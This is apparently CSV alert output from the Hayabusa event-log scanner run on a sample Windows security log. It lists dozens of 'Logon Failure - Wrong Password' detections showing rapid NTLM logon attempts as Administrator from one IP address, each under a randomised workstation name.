01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 